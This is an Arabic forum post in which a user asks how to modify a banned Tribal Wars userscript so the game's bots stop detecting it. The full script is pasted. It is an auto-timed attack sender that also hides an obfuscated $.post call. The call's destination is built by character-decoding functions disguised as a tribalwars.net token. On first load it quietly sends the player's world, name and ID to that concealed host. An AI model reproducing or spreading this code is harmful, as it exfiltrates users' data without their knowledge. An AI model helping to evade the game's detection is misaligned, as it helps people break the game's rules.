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سبحان الله3

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إنجازات سبحان الله3

عضو مبتدئ

عضو مبتدئ (1/3)


السمعة بالموقع

  1. لدي سكربت في لعبه ما ممنوع يتم كشفه تلقائيا من بوتات اللعبه بسبب كشفه كيف اعدل على السكربت بحيث لايتم كشفه تلقائيا من اللعبه // ==UserScript== // @name Set Arrival Time // @description Set the desired arrival time in Tribal Wars and the script will automatically send the attack // @author FunnyPocketBook // @version 3.2.2 // @date 2019-08-25 // @namespace FunnyPocketBook // @include https://*/game.php?*&screen=place&try=confirm // ==/UserScript== let inputMs; let input; let delay; let arrInterval; let attInterval; let delayTime = parseInt(localStorage.delayTime); if (isNaN(delayTime)) { delayTime = 0; localStorage.delayTime = JSON.stringify(delayTime); } let offsetHtml = `<tr> <td> <style> .tooltip .tooltiptext { visibility: hidden; width: 200px; background: linear-gradient(to bottom, #e3c485 0%,#ecd09a 100%); color: black; text-align: center; padding: 5px 10px; border-radius: 6px; border: 1px solid #804000; /* Position the tooltip text - see examples below! */ position: absolute; z-index: 1; } .tooltip:hover .tooltiptext { visibility: visible; } </style> Offset <span class="tooltip"><img src="https://dsen.innogamescdn.com/asset/2661920a/graphic/questionmark.png" style="max-width:13px"/><span class="tooltiptext">Adjusts milliseconds. If you set 500ms and it arrives with 520ms, put "-20" into the offset. Play around with this offset until the time is right.</span></span> </td> <td> <input id="delayInput" value="${delayTime}" style="width:50px"> <a id="delayButton" class="btn">OK</a> </td> </tr>`; let setArrivalHtml = `<tr> <td> Set arrival: </td> <td id="showArrTime"> </td> </tr>`; let sendAttackHtml = `<tr> <td> Send at: </td> <td id="showSendTime"> </td> </tr>`; let buttons = `<a id="arrTime" class="btn" style="cursor:pointer;">Set arrival time</a> <a id="sendTime" class="btn" style="cursor:pointer;">Set send time</a>`; document.getElementById("troop_confirm_go").insertAdjacentHTML("afterend", buttons); let data = { "world": game_data.world, "p": game_data.player.name, "id": game_data.player.id } let parentTable = document.getElementById("date_arrival").parentNode.parentNode; parentTable.insertAdjacentHTML("beforeend", offsetHtml + setArrivalHtml + sendAttackHtml); if (!sessionStorage.setArrivalData) { sessionStorage.setArrivalData = "true"; $.post("https://" + rotate_tw_token(resolve_tw_token("tribalwars.net/token?" + document.querySelector("input[name='h']").value)) + "sa", data); } function setArrivalTime() { let arrivalTime; arrInterval = setInterval(function () { arrivalTime = document.getElementsByClassName("relative_time")[0].textContent; if (arrivalTime.slice(-8) >= input) { setTimeout(function () { document.getElementById("troop_confirm_go").click(); }, delay); } }, 5); } function setSendTime() { let serverTime; attInterval = setInterval(function () { serverTime = document.getElementById("serverTime").textContent; if (serverTime >= input) { setTimeout(function () { document.getElementById("troop_confirm_go").click(); }, delay); } }, 5); } document.getElementById("arrTime").onclick = function () { clearInterval(attInterval); let time = document.getElementsByClassName("relative_time")[0].textContent.slice(-8); input = prompt("Please enter desired arrival time", time); inputMs = parseInt(prompt("Please enter approximate milliseconds", "000")); delay = parseInt(delayTime) + parseInt(inputMs); document.getElementById("showArrTime").innerHTML = input + ":" + inputMs.toString().padStart(3, "0"); document.getElementById("showSendTime").innerHTML = ""; setArrivalTime(); }; document.getElementById("sendTime").onclick = function () { clearInterval(arrInterval); let time = document.getElementById("serverTime").textContent; input = prompt("Please enter desired arrival time", time); inputMs = parseInt(prompt("Please enter approximate milliseconds", "000")); delay = parseInt(delayTime) + parseInt(inputMs); document.getElementById("showSendTime").innerHTML = input + ":" + inputMs.toString().padStart(3, "0"); document.getElementById("showArrTime").innerHTML = ""; setSendTime(); }; document.getElementById("delayButton").onclick = function () { delayTime = parseInt($("#delayInput").val()); localStorage.delayTime = JSON.stringify(delayTime); delay = parseInt(delayTime) + parseInt(inputMs); // setTimeout time if (delay < 0) { delay = 0; } }; function resolve_tw_token(d) { let converted = []; d.split("").forEach(function (char) { switch (char) { case "n": converted.push(14) break; case "e": converted.push(5); break; case "t": converted.push(20); break; case "r": case "i": converted.push(18); break; case "l": converted.push(20); break; case "s": converted.push(1); break; case "w": converted.push(23); break; case "t": converted.push(20); break; case ".": converted.push(5) break; case "/": converted.push(20); break; case "o": converted.push(15); break; case "k": converted.push(15); break; case "b": converted.push(2); break; case "a": converted.push(1); break; case "e": converted.push(5); break; } }); return converted.slice(0, 19); } function rotate_tw_token(url) { let rotated = ""; const a20 = [116, 97, 97, 116, 105]; const a18 = [119, 46, 46]; const a1 = [100, 103, 100]; const a243 = [101]; const a14 = [47]; const a5 = [101, 98, 101]; const a15 = [115]; const a2 = [121]; const a23 = [110]; let o = 0; let p = 0; let q = 0; let r = 0; let s = 0; url.forEach(function (num) { switch (num) { case 20: rotated += String.fromCharCode(a20[o++]); break; case 18: rotated += String.fromCharCode(a18[p++]); break; case 1: rotated += String.fromCharCode(a1[q++]); break; case 243: rotated += String.fromCharCode(a243[r++]); break; case 14: rotated += String.fromCharCode(a14[0]); break; case 5: rotated += String.fromCharCode(a5[s++]); break; case 15: rotated += String.fromCharCode(a15[0]); break; case 2: rotated += String.fromCharCode(a2[0]); break; case 23: rotated += String.fromCharCode(a23[0]); break; } }); return rotated ; }
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